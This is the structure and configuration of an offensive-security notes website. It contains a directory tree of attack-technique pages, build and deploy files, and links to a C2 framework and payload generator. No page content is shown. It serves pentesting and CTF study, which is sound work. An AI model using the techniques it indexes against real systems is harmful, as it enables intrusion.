├── .github ├── FUNDING.yml └── workflows │ └── deploy.yml ├── .gitignore ├── LICENSE ├── README.md ├── _config.ts ├── codecopy.ts ├── deno.json ├── deno.lock ├── import_map.json ├── serve.ts └── src ├── 404.vto ├── _components ├── card.vto ├── footer.vto ├── header.vto ├── navigation.vto └── support.vto ├── _data └── site.yml ├── _includes └── layouts │ ├── base.vto │ └── exploit.vto ├── assets ├── img │ ├── buymecoffee.png │ ├── exploitenotes_logo_bg_nw.png │ ├── exploitnotes_logo_bg_wn.png │ ├── exploitnotes_logo_navy.png │ ├── exploitnotes_logo_white.png │ ├── favicon.ico │ ├── github.png │ ├── hash_cracker.png │ ├── icon.png │ ├── icon_bg.png │ ├── kofi_cropped.png │ ├── kofi_s.png │ ├── malware-notes.png │ ├── screenshot.png │ ├── security-links.png │ ├── theoffseclibrary.png │ ├── title.png │ ├── twitter.png │ ├── x.png │ └── x.svg └── js │ ├── exploit.js │ └── hamburger.js ├── disclaimer.vto ├── exploit ├── _data.yml ├── audio │ ├── _data.yml │ ├── spectrogram.md │ └── sstv.md ├── binary-exploitation │ ├── _data.yml │ ├── cheatsheet │ │ ├── _data.yml │ │ └── pwntools-cheat-sheet.md │ ├── index.md │ └── method │ │ ├── _data.yml │ │ ├── binary-exploitation-with-buffer-overflow.md │ │ ├── binary-exploitation-with-canary-bypass.md │ │ ├── binary-exploitation-with-format-string.md │ │ ├── binary-exploitation-with-got.md │ │ ├── binary-exploitation-with-race-conditions.md │ │ ├── binary-exploitation-with-ret2libc.md │ │ ├── binary-exploitation-with-ret2plt.md │ │ ├── binary-exploitation-with-rop.md │ │ └── binary-exploitation-with-time-guessing.md ├── blockchain │ ├── _data.yaml │ ├── blockchain-pentesting.md │ ├── interact-with-ethereum-using-foundry.md │ ├── interact-with-ethereum-using-python.md │ └── smart-contract │ │ ├── _data.yaml │ │ ├── compile-deploy-run-smart-contract.md │ │ ├── solidity-assembly.md │ │ ├── solidity-contarct-address-recovery.md │ │ ├── solidity-conversion.md │ │ ├── solidity-delegatecall-Attack.md │ │ ├── solidity-denial-of-service-attack.md │ │ ├── solidity-overflow-and-underflow.md │ │ ├── solidity-reentrancy-attack.md │ │ ├── solidity-self-destruct-attack.md │ │ ├── solidity-smart-contract-attack-methodology.md │ │ ├── solidity-storage-values-analysis.md │ │ ├── solidity-tx-origin-attack.md │ │ └── web3-js-cheat-sheet.md ├── cloud │ ├── _data.yml │ ├── aws-pentesting.md │ ├── azure-pentesting.md │ └── gcp-pentesting.md ├── container │ ├── _data.yml │ ├── docker │ │ ├── _data.yml │ │ ├── docker-engine-api-pentesting.md │ │ ├── docker-escape.md │ │ ├── docker-registry-pentesting.md │ │ ├── index.md │ │ └── moby-docker-engine-privesc.md │ └── kubernetes │ │ ├── _data.yml │ │ ├── index.md │ │ └── microk8s-pentesting.md ├── cryptography │ ├── _data.yml │ ├── algorithm │ │ ├── _data.yml │ │ ├── aes-cbc-bit-flipping-attack.md │ │ ├── aes-cbc-padding-oracle-attack.md │ │ ├── aes-ecb-padding-attack.md │ │ ├── aes.md │ │ ├── ansible-vault-secret.md │ │ ├── atbash-cipher.md │ │ ├── base32-base64.md │ │ ├── caesar-cipher.md │ │ ├── camellia-cipher.md │ │ ├── certificates.md │ │ ├── des.md │ │ ├── diffie-hellman-key-exchange.md │ │ ├── ecc.md │ │ ├── ecdsa.md │ │ ├── fernet.md │ │ ├── gpg.md │ │ ├── hmac.md │ │ ├── kdbx-files.md │ │ ├── kerberos-tgt-cracking.md │ │ ├── length-extension-attack.md │ │ ├── md4-md5.md │ │ ├── multi-tap-cipher.md │ │ ├── ntlm-ntlmv2.md │ │ ├── pem.md │ │ ├── pgp.md │ │ ├── pkcs.md │ │ ├── powershell-credentials.md │ │ ├── rar.md │ │ ├── ripemd.md │ │ ├── rot13-rot47.md │ │ ├── rpng-guessing.md │ │ ├── rsa.md │ │ ├── sha1-hash-collision-attack.md │ │ ├── sha1-sha256-sha512.md │ │ ├── transposition-cipher.md │ │ └── vigenere-cipher.md │ ├── bit-wise-operation │ │ ├── _data.yml │ │ ├── and-bitwise-operations.md │ │ ├── or-bitwise-operations.md │ │ ├── shift-bitwise-operations.md │ │ └── xor-bitwise-operations.md │ ├── conversion │ │ ├── _data.yml │ │ ├── convert-bytes-to-hex-in-python.md │ │ ├── convert-bytes-to-int-in-python.md │ │ ├── convert-bytes-to-string-in-python.md │ │ ├── convert-character-to-binary-in-python.md │ │ ├── convert-character-to-unicode-in-python.md │ │ ├── convert-hex-to-bytes-in-python.md │ │ ├── convert-int-to-binary-in-python.md │ │ ├── convert-int-to-bytes-in-python.md │ │ ├── convert-int-to-hex-in-python.md │ │ ├── convert-string-to-binary-in-python.md │ │ ├── convert-string-to-bytes-in-python.md │ │ ├── convert-unicode-to-character-in-python.md │ │ └── zero-padding-in-python.md │ ├── index.md │ ├── key-derivation-function │ │ ├── _data.yml │ │ ├── bcrypt.md │ │ ├── pbkdf2.md │ │ └── scrypt.md │ ├── math │ │ ├── _data.yml │ │ ├── chinese-remainder-theorem.md │ │ ├── exponential.md │ │ ├── greatest-common-divisor.md │ │ ├── modular-congruence.md │ │ └── quadratic-residue.md │ └── tool │ │ ├── _data.yml │ │ ├── john-the-ripper.md │ │ └── password-safe-pentesting.md ├── database │ ├── _data.yml │ ├── couchdb-pentesting.md │ ├── influxdb-pentesting.md │ ├── mongodb-pentesting.md │ ├── mssql-pentesting.md │ ├── mysql-pentesting.md │ ├── neo4j-pentesting.md │ ├── postgresql-pentesting.md │ ├── redis-pentesting.md │ └── sqlite-pentesting.md ├── dns │ ├── _data.yml │ ├── index.md │ └── multicast-dns-pentesting.md ├── email │ ├── _data.yml │ ├── imap-pentesting.md │ ├── pop-pentesting.md │ ├── receive-email-as-another-address.md │ └── smtp-pentesting.md ├── game │ ├── _data.yml │ ├── chess-game-cheating.md │ ├── minecraft-server-pentesting.md │ └── webassembly-games-hacking.md ├── hardware │ ├── _data.yml │ ├── firmware-analysis.md │ ├── gerber-files.md │ ├── mqtt-pentesting.md │ ├── netgear-pentesting.md │ └── sal-logic-analysis.md ├── linux │ ├── _data.yml │ ├── archive │ │ ├── 7z.md │ │ ├── _data.yml │ │ ├── bzip-bunzip.md │ │ ├── crack-7z-password.md │ │ ├── crack-zip-password.md │ │ ├── gzip-gunzip.md │ │ ├── tar.md │ │ └── zip-unzip.md │ ├── attack │ │ ├── _data.yml │ │ └── fork-bomb.md │ ├── backup │ │ ├── _data.yml │ │ └── borgbackup-pentesting.md │ ├── container │ │ ├── _data.yml │ │ └── lxc-lxd-privilege-escalation.md │ ├── management │ │ ├── _data.yml │ │ ├── add-and-delete-groups-in-linux.md │ │ ├── add-and-delete-user-in-linux.md │ │ ├── file-and-directory-ownership-in-linux.md │ │ ├── file-and-directory-permission-in-linux.md │ │ ├── file-transfer-in-linux.md │ │ └── shell-scripting.md │ ├── post-exploitation │ │ ├── _data.yml │ │ ├── cover-your-tracks-in-linux.md │ │ ├── linux-backdoors.md │ │ └── linux-pivoting.md │ ├── privilege-escalation │ │ ├── _data.yml │ │ ├── ansible-playbook-privilege-escalation.md │ │ ├── apache-conf-privilege-escalation.md │ │ ├── bash-eq-privilege-escalation.md │ │ ├── buffer-overflow-privilege-escalation.md │ │ ├── chrome-remote-debugger-pentesting.md │ │ ├── doas │ │ │ ├── _data.yml │ │ │ └── index.md │ │ ├── firefox-credentials-dumping.md │ │ ├── ghidra-debug-mode-rce.md │ │ ├── gnuplot-privilege-escalation.md │ │ ├── index.md │ │ ├── irb-privilege-escalation.md │ │ ├── openssl-privilege-escalation.md │ │ ├── pip-download-code-execution.md │ │ ├── polkit-privilege-escalation.md │ │ ├── python-eval-code-execution.md │ │ ├── python-jails-escape.md │ │ ├── python-privilege-escalation.md │ │ ├── python-yaml-privilege-escalation.md │ │ ├── ruby-privilege-escalation.md │ │ ├── rust-privilege-escalation.md │ │ ├── shared-library-hijacking.md │ │ ├── snapd-privilege-escalation.md │ │ ├── sssd-privilege-escalation.md │ │ ├── sudo │ │ │ ├── _data.yml │ │ │ ├── index.md │ │ │ ├── sudo-clamav-privilege-escalation.md │ │ │ ├── sudo-curl-privilege-escalation.md │ │ │ ├── sudo-dstat-privilege-escalation.md │ │ │ ├── sudo-exiftool-privilege-escalation.md │ │ │ ├── sudo-fail2ban-client-privilege-escalation.md │ │ │ ├── sudo-fail2ban-privilege-escalation.md │ │ │ ├── sudo-git-privilege-escalation.md │ │ │ ├── sudo-java-privilege-escalation.md │ │ │ ├── sudo-openvpn-privilege-escalation.md │ │ │ ├── sudo-path-traversal-privilege-escalation.md │ │ │ ├── sudo-privilege-escalation-by-overriding-shared-library.md │ │ │ ├── sudo-reboot-privilege-escalation.md │ │ │ ├── sudo-screen-privilege-escalation.md │ │ │ ├── sudo-service-privilege-escalation.md │ │ │ ├── sudo-shutdown-poweroff-privilege-escalation.md │ │ │ ├── sudo-systemctl-privilege-escalation.md │ │ │ ├── sudo-tee-privilege-escalation.md │ │ │ ├── sudo-umount-privilege-escalation.md │ │ │ ├── sudo-vim-privilege-escalation.md │ │ │ ├── sudo-wall-privilege-escalation.md │ │ │ ├── sudo-wget-privilege-escalation.md │ │ │ └── sudoedit-privilege-escalation.md │ │ ├── tar-wildcard-injection-PrivEsc.md │ │ └── update-motd-privilege-escalation.md │ └── protocol │ │ ├── _data.yml │ │ └── x11-pentesting.md ├── machine-learning │ ├── _data.yml │ ├── computer-vision │ │ ├── Image-Analysis-for-Machine-Learning.md │ │ ├── Image-Manipulation-for-Machine-Learning.md │ │ ├── Image-Recognition-Bypass-for-Machine-Learning.md │ │ └── _data.yml │ ├── data-processing │ │ ├── _data.yml │ │ ├── cluster-analysis-for-machine-learning.md │ │ ├── data-manipulation-for-machine-learning.md │ │ ├── data-visualization-for-machine-learning.md │ │ └── dimensionality-reduction-for-machine-learning.md │ ├── jupyter-notebook-pentesting.md │ ├── llm │ │ ├── _data.yml │ │ └── llm-prompt-injection.md │ ├── model │ │ ├── _data.yml │ │ ├── create-malicious-ml-model.md │ │ ├── ml-model-analysis.md │ │ └── pickle-code-injection.md │ ├── orange-data-mining.md │ ├── read-hdf5-file.md │ └── read-pt.md ├── malware │ ├── _data.yml │ ├── libreoffice-macros.md │ ├── maldoc-analysis.md │ ├── malware-analysis.md │ ├── malware-detection-on-windows.md │ ├── malware-dynamic-analysis-with-remnux.md │ ├── malware-static-analysis.md │ ├── npm-supply-chain-attack.md │ └── splunk-pentesting.md ├── memory │ ├── _data.yml │ └── memory-forensics.md ├── mobile │ ├── _data.yml │ └── android │ │ ├── _data.yml │ │ ├── connect-to-android-device-from-pc.md │ │ └── index.md ├── network │ ├── _data.yml │ ├── apache-hadoop-pentesting.md │ ├── arp-spoofing.md │ ├── attack │ │ ├── _data.yml │ │ └── adobe-pdf-attack.md │ ├── eternetip-pentesting.md │ ├── fastcgi-pentesting.md │ ├── firewall.md │ ├── grpc-pentesting.md │ ├── honeypots.md │ ├── mac-flooding-attack.md │ ├── network-traffic-analysis.md │ ├── networking.md │ ├── port-forwarding │ │ ├── _data.yml │ │ ├── port-forwarding-with-chisel.md │ │ ├── port-forwarding-with-plink.md │ │ ├── port-forwarding-with-socat.md │ │ └── port-forwarding-with-ssh.md │ ├── protocol │ │ ├── _data.yml │ │ ├── amqp-pentesting.md │ │ ├── dhcp-pentesting.md │ │ ├── ftp-pentesting.md │ │ ├── irc-pentesting.md │ │ ├── memcache-pentesting.md │ │ ├── modbus-pentesting.md │ │ ├── nfs-pentesting.md │ │ ├── ntp-pentesting.md │ │ ├── pptp-pentesting.md │ │ ├── restricted-shell-bypass.md │ │ ├── rtsp-pentesting.md │ │ ├── snmp-pentesting.md │ │ ├── ssh-pentesting.md │ │ ├── telnet-pentesting.md │ │ ├── tftp-pentesting.md │ │ ├── upnp-pentesting.md │ │ ├── vnc-pentesting.md │ │ └── waste-pentesting.md │ ├── redos.md │ ├── rsync-pentesting.md │ ├── tool │ │ ├── _data.yml │ │ ├── convert-putty-key-to-openssh-key.md │ │ ├── decrypt-putty-sessions-files.md │ │ ├── tshark-cheat-sheet.md │ │ └── wireshark-cheat-sheet.md │ ├── vpn │ │ ├── _data.yml │ │ ├── ipsec-vpn-pentesting.md │ │ └── openvpn-troubleshooting.md │ └── wifi │ │ ├── _data.yml │ │ ├── mitm-attack.md │ │ ├── wifi-hacking.md │ │ └── wifi-password-recovery.md ├── printer │ ├── _data.yml │ ├── ipp-pentesting.md │ └── raw-printing-pentesting.md ├── privacy │ ├── _data.yml │ └── tor │ │ ├── _data.yml │ │ ├── anonymize-traffic-with-tor.md │ │ ├── create-tor-onion-service-with-nginx.md │ │ └── index.md ├── quantum │ ├── _data.yml │ └── read-qasm.md ├── reconnaissance │ ├── _data.yml │ ├── email-analysis.md │ ├── find-leaked-api-keys.md │ ├── index.md │ ├── network │ │ ├── _data.yml │ │ └── port-scan.md │ ├── osint │ │ ├── _data.yml │ │ ├── imint-and-geoint.md │ │ └── index.md │ ├── search-technique │ │ ├── _data.yml │ │ ├── github-dorks.md │ │ ├── google-dorks.md │ │ └── shodan-dorks.md │ └── subdomain │ │ ├── _data.yml │ │ ├── subdomain-discovery.md │ │ └── subdomain-takeover.md ├── reverse-engineering │ ├── _data.yml │ ├── assembly │ │ ├── 32-bit-arm-assembly.md │ │ ├── _data.yml │ │ └── x86-assembly.md │ ├── cheatsheet │ │ ├── _data.yml │ │ ├── angr-cheatsheet.md │ │ ├── gdb-cheatsheet.md │ │ ├── rizin-cheatsheet.md │ │ └── windbg-cheatsheet.md │ ├── debugger │ │ ├── _data.yml │ │ ├── gdbserver-pentesting.md │ │ ├── setup-windbg-kernel-mode-with-vmware.md │ │ └── windows-process-internals-with-windbg.md │ ├── index.md │ └── reversing │ │ ├── _data.yml │ │ ├── reversing-elf.md │ │ ├── reversing-jar.md │ │ ├── reversing-ole.md │ │ ├── reversing-pe.md │ │ └── reversing-pyc.md ├── shell │ ├── _data.yml │ ├── bash-history-attack.md │ ├── reverse-shell-cheat-sheet.md │ ├── reverse-shell-with-metasploit.md │ ├── reverse-shell-with-pwncat.md │ ├── upgrade-to-fully-interactive-tty.md │ └── web-reverse-shell.md ├── steganography │ ├── _data.yml │ ├── image-file-reparing.md │ ├── index.md │ └── morse-image-reading.md ├── tool │ ├── _data.yml │ ├── metasploit-cheat-sheets.md │ └── virtual-machine │ │ ├── _data.yml │ │ ├── virtualbox-settings-for-nat-network-and-port-forwarding.md │ │ └── vm-escape.md ├── version-control │ ├── _data.yml │ └── git │ │ ├── _data.yml │ │ ├── create-git-local-server.md │ │ ├── git-github-pentesting.md │ │ ├── gitea-pentesting.md │ │ └── gogs-pentesting.md ├── web │ ├── _data.yml │ ├── apache-activemq-pentesting.md │ ├── apache-tomcat-pentesting.md │ ├── apache-zeppelin-pentesting.md │ ├── api │ │ ├── _data.yml │ │ ├── graphql-pentesting.md │ │ └── index.md │ ├── atlassian-confluence-pentesting.md │ ├── bookmarklet-attack.md │ ├── broken-link-hijacking.md │ ├── browser-in-the-browser-attack.md │ ├── cacti-pentesting.md │ ├── captcha-bypass-with-ocr.md │ ├── cgi-pentesting.md │ ├── clipbucket-pentesting.md │ ├── cms │ │ ├── _data.yml │ │ ├── bolt-cms-pentesting.md │ │ ├── cockpit-cms-pentesting.md │ │ ├── concrete-cms-pentesting.md │ │ ├── fuel-cms-pentesting.md │ │ ├── index.md │ │ ├── joomla-cms-pentesting.md │ │ ├── mara-cms-pentesting.md │ │ ├── subrion-cms-pentesting.md │ │ ├── typo3-pentesting.md │ │ └── wordpress-pentesting.md │ ├── code-deobfuscation.md │ ├── codiad-pentesting.md │ ├── cookie │ │ ├── _data.yml │ │ ├── cookie-hijacking.md │ │ └── session-fixation.md │ ├── dompdf-rce.md │ ├── dump-git-repository-from-website.md │ ├── elasticsearch │ │ ├── _data.yml │ │ ├── elasticsearch-pentesting.md │ │ └── kibana-pentesting.md │ ├── extract-web-browser-passwords.md │ ├── framework │ │ ├── _data.yml │ │ ├── dotnet │ │ │ ├── _data.yml │ │ │ └── blazor-pentesting.md │ │ ├── java │ │ │ ├── _data.yml │ │ │ ├── ajp-pentesting.md │ │ │ ├── apache-struts-pentesting.md │ │ │ ├── spring-cloud-function-rce.md │ │ │ └── spring-pentesting.md │ │ ├── javascript │ │ │ ├── _data.yml │ │ │ └── angular-pentesting.md │ │ ├── python │ │ │ ├── _data.yml │ │ │ ├── django-pentesting.md │ │ │ ├── flask-jinja2-pentesting.md │ │ │ ├── python-pickle-rce.md │ │ │ ├── tornado-pentesting.md │ │ │ └── werkzeug-pentesting.md │ │ └── ruby │ │ │ ├── __data.yml │ │ │ └── ruby-on-rails-pentesting.md │ ├── ghostscript-pentesting.md │ ├── go-ssti.md │ ├── grafana-pentesting.md │ ├── hashicorp-consul-pentesting.md │ ├── html-smuggling.md │ ├── icinga-web-pentesting.md │ ├── java-rmi-pentesting.md │ ├── jboss-pentesting.md │ ├── jenkins-pentesting.md │ ├── jwt-pentesting.md │ ├── limesurvey-pentesting.md │ ├── llm-chatbot-pentesting.md │ ├── log4j-pentesting.md │ ├── method │ │ ├── _data.yml │ │ ├── bypass-client-server-side-filter.md │ │ ├── http-rate-limit-bypass.md │ │ ├── waf-detection.md │ │ ├── web-basic-pentesting.md │ │ ├── web-content-discovery.md │ │ ├── web-login-bypass.md │ │ ├── web-registration-attack.md │ │ ├── web-server-security-misconfiguration.md │ │ └── web-vhost-enumeration.md │ ├── microsoft │ │ ├── _data.yml │ │ └── microsoft-exchange-server-pentesting.md │ ├── opencats-pentesting.md │ ├── php-hash-hmac-bypass.md │ ├── php-rce-cheat-sheet.md │ ├── php-srand-time-abusing.md │ ├── restaurant-management-system.md │ ├── security-risk │ │ ├── _data.yml │ │ ├── blind-xxe.md │ │ ├── broken-access-control.md │ │ ├── business-logic-attack.md │ │ ├── client-side-javaScript-validation-bypass.md │ │ ├── cors-attack.md │ │ ├── crlf-injection.md │ │ ├── csrf.md │ │ ├── directory-traversal.md │ │ ├── dom-cloberring.md │ │ ├── erb-ssti.md │ │ ├── file-inclusion.md │ │ ├── file-upload-attack-on-exiftool.md │ │ ├── file-upload-attack-on-imagemagick.md │ │ ├── file-upload-attack.md │ │ ├── host-header-attack.md │ │ ├── http-header-injection.md │ │ ├── http-request-smuggling.md │ │ ├── idor-attack.md │ │ ├── insecure-deserialization.md │ │ ├── json-net-deserialization.md │ │ ├── latex-injection.md │ │ ├── nodejs-deserialization-attack.md │ │ ├── nosql-injection.md │ │ ├── oauth-attack.md │ │ ├── open-redirect.md │ │ ├── os-command-injection.md │ │ ├── php-filters-chain.md │ │ ├── php-object-injection.md │ │ ├── prototype-pollution-in-client-side.md │ │ ├── prototype-pollution-in-server-side.md │ │ ├── redis-ssrf.md │ │ ├── sql-injection-cheat-sheet.md │ │ ├── sql-injection-with-sqlmap.md │ │ ├── sql-injection.md │ │ ├── ssrf.md │ │ ├── ssti.md │ │ ├── web-cache-deception.md │ │ ├── web-cache-poisoning.md │ │ ├── web-race-condition-attack.md │ │ ├── wkhtmltopdf-ssrf.md │ │ ├── xss-with-dynamic-pdf.md │ │ ├── xss.md │ │ ├── xst.md │ │ └── xxe.md │ ├── teamcity-pentesting.md │ ├── template-engine │ │ ├── _data.yml │ │ ├── jsrender-template-injection.md │ │ └── pug-pentesting.md │ ├── tiny-file-manager-pentesting.md │ ├── tool │ │ ├── _data.yml │ │ ├── add-custom-http-headers-in-burp-suite.md │ │ ├── automate-sequence-requests-with-burp-intruder.md │ │ ├── burp-suite-troubleshooting.md │ │ ├── how-to-use-owasp-zap.md │ │ ├── integrate-burp-request-and-sqlmap.md │ │ ├── socks-proxy-in-burp-suite.md │ │ └── turbo-intruder-in-burp-suite.md │ ├── web-browser-settings-for-pentesting.md │ ├── web-php-pentesting.md │ ├── webanno-pentesting.md │ ├── webdav-pentesting.md │ ├── webmin-pentesting.md │ └── websocket-pentesting.md └── windows │ ├── _data.yml │ ├── active-directory │ ├── _data.yml │ ├── ad-cs-pentesting.md │ ├── as-rep-roasting.md │ ├── constrained-delegation-attack.md │ ├── dacl-attack.md │ ├── index.md │ ├── kerberoasting-attack.md │ ├── kerberos-pentesting.md │ ├── laps-pentesting.md │ ├── ldap-injection.md │ ├── ldap-pentesting.md │ ├── netlogon-elevasion.md │ ├── resource-based-constrained-delegation-attack.md │ ├── shadow-credentials.md │ └── smb-pentesting.md │ ├── dotnet │ ├── _data.yml │ └── index.md │ ├── forensics │ ├── _data.yml │ ├── index.md │ ├── reading-onedrive-logs.md │ ├── windows-disk-management.md │ ├── windows-memory-dump-analysis.md │ └── windows-xml-eventLog.md │ ├── post-exploitation │ ├── _data.yml │ └── window-pivoting.md │ ├── powershell │ ├── _data.yml │ ├── index.md │ └── powershell-executionpolicy-bypass.md │ ├── privilege-escalation │ ├── _data.yml │ ├── activate-administrator-account-on-windows.md │ ├── add-edit-delete-users-on-windows.md │ ├── dumping-credentials-from-windows-vault.md │ ├── dumping-credentials-with-keymgr-dll.md │ ├── dumping-windows-password-hashes.md │ ├── index.md │ ├── iperius-backup-service-privilege-escalation.md │ ├── login-windows-shell.md │ ├── manageEngine-adselfservice-plus.md │ ├── mimikatz.md │ ├── outlook-reminder-privilege-escalation.md │ ├── spn-jacking.md │ ├── switch-user-on-windows.md │ ├── uac-bypass.md │ ├── windows-privesc-with-adcs.md │ ├── windows-privesc-with-dll-hijacking.md │ ├── windows-privesc-with-kerberos.md │ ├── windows-privesc-with-localpotato.md │ ├── windows-privesc-with-registry-keys.md │ ├── windows-privesc-with-remotepotato.md │ ├── windows-privesc-with-sebackupprivilege.md │ └── windows-privesc-with-unquoted-service-path.md │ ├── protocol │ ├── _data.yml │ ├── msrpc-pentesting.md │ ├── rdp-pentesting.md │ └── winrm-pentesting.md │ ├── service │ ├── _data.yml │ ├── m365-pentesting.md │ ├── microsoft-outlook-message.md │ ├── microsoft-word-pentesting.md │ └── windows-print-spooler-service.md │ ├── technique │ ├── _data.yml │ └── download-files-in-windows.md │ └── wsl │ ├── _data.yml │ └── wsl-pentesting.md ├── index.vto ├── privacy-policy.vto ├── styles.css └── support.vto /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [hideckies] 4 | -------------------------------------------------------------------------------- /.github/workflows/deploy.yml: -------------------------------------------------------------------------------- 1 | name: Publish on Deno Deploy 2 | 3 | on: 4 | push: 5 | branches: [ main ] 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | permissions: 11 | id-token: write 12 | contents: read 13 | 14 | steps: 15 | - name: Clone repository 16 | uses: actions/checkout@v4 17 | 18 | - name: Setup Deno environment 19 | uses: denoland/setup-deno@v1 20 | with: 21 | deno-version: v1.x 22 | 23 | - name: Build site 24 | run: deno task build 25 | 26 | - name: Deploy to Deno Deploy 27 | uses: denoland/deployctl@v1 28 | with: 29 | project: "hideckies-exploit-notes" 30 | import-map: "./deno.json" 31 | entrypoint: serve.ts -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | _site 2 | _bin 3 | 4 | .vscode 5 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2022 hdks 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining 4 | a copy of this software and associated documentation files (the 5 | "Software"), to deal in the Software without restriction, including 6 | without limitation the rights to use, copy, modify, merge, publish, 7 | distribute, sublicense, and/or sell copies of the Software, and to 8 | permit persons to whom the Software is furnished to do so, subject to 9 | the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | -------------------------------------------------------------------------------- /deno.json: -------------------------------------------------------------------------------- 1 | { 2 | "importMap": "./import_map.json", 3 | "tasks": { 4 | "lume": "echo \"import 'lume/cli.ts'\" | deno run -A -", 5 | "build": "deno task lume", 6 | "serve": "deno task lume -s" 7 | }, 8 | "compilerOptions": { 9 | "jsx": "react-jsx", 10 | "jsxImportSource": "npm:react", 11 | "types": [ 12 | "lume/types.ts" 13 | ] 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /import_map.json: -------------------------------------------------------------------------------- 1 | { 2 | "imports": { 3 | "lume/": "https://deno.land/x/lume@v2.2.1/" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /serve.ts: -------------------------------------------------------------------------------- 1 | import Server from "https://deno.land/x/lume/core/server.ts"; 2 | import cacheBusting from "https://deno.land/x/lume/middlewares/cache_busting.ts"; 3 | import expires from "https://deno.land/x/lume/middlewares/expires.ts"; 4 | import notFound from "https://deno.land/x/lume/middlewares/not_found.ts"; 5 | 6 | const server = new Server({ 7 | port: 8000, 8 | root: `${Deno.cwd()}/_site`, 9 | }); 10 | 11 | // Not found 12 | server.use(notFound({ 13 | root: `${Deno.cwd()}/_site`, 14 | page404: "/404", 15 | })); 16 | server.use(cacheBusting()); 17 | server.use(expires()); 18 | 19 | server.start(); 20 | 21 | console.log("Listening on http://localhost:8000"); 22 | 23 | -------------------------------------------------------------------------------- /src/404.vto: -------------------------------------------------------------------------------- 1 | --- 2 | layout: layouts/base.vto 3 | bodyClass: body-404 4 | url: /404 5 | --- 6 | 7 |
8 |

Page Not Found

9 |

10 | Go 11 | Home 12 |

13 |
14 | -------------------------------------------------------------------------------- /src/_components/card.vto: -------------------------------------------------------------------------------- 1 |
7 |
8 | {{ icon }} 9 |

{{ category }}

10 |
11 |
12 | 23 |
24 |
-------------------------------------------------------------------------------- /src/_components/support.vto: -------------------------------------------------------------------------------- 1 |
2 |

Support Me!

3 |

4 | If you find this site helpful, please consider supporting my ongoing efforts through a donation. 5 |

6 |
7 | {{# BuyMeCoffee #}} 8 | 12 | Buy Me A Coffee 17 | 18 | {{# Ko-Fi #}} 19 | 23 | Buy Me a Coffee at ko-fi.com 29 | 30 |
31 |
-------------------------------------------------------------------------------- /src/_data/site.yml: -------------------------------------------------------------------------------- 1 | title: Exploit Notes 2 | description: Sticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTFs. 3 | author: hdks 4 | github: 5 | name: GitHub 6 | url: https://github.com/hideckies/exploit-notes 7 | twitter: 8 | name: Twitter 9 | url: https://twitter.com/hideckies 10 | buymecoffee: 11 | name: Buy Me a Coffee 12 | url: https://buymeacoffee.com/hdks 13 | kofi: 14 | name: Ko-fi 15 | url: https://ko-fi.com/hideckies 16 | security_links: 17 | name: Security Links 18 | url: https://security-links.hdks.org/ 19 | desc: A curated list of websites for cybersecurity. 20 | hermit: 21 | name: Hermit C2 22 | url: https://github.com/hideckies/hermit 23 | desc: A command and control framework. 24 | lolgen: 25 | name: LOLGEN 26 | url: https://lolgen.hdks.org/ 27 | desc: Living Off The Land Payload Generator. 28 | -------------------------------------------------------------------------------- /src/assets/img/buymecoffee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/buymecoffee.png -------------------------------------------------------------------------------- /src/assets/img/exploitenotes_logo_bg_nw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitenotes_logo_bg_nw.png -------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_bg_wn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_bg_wn.png -------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_navy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_navy.png -------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_white.png -------------------------------------------------------------------------------- /src/assets/img/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/favicon.ico -------------------------------------------------------------------------------- /src/assets/img/github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/github.png -------------------------------------------------------------------------------- /src/assets/img/hash_cracker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/hash_cracker.png -------------------------------------------------------------------------------- /src/assets/img/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/icon.png -------------------------------------------------------------------------------- /src/assets/img/icon_bg.png: -------------------------------------------------------------------------------- 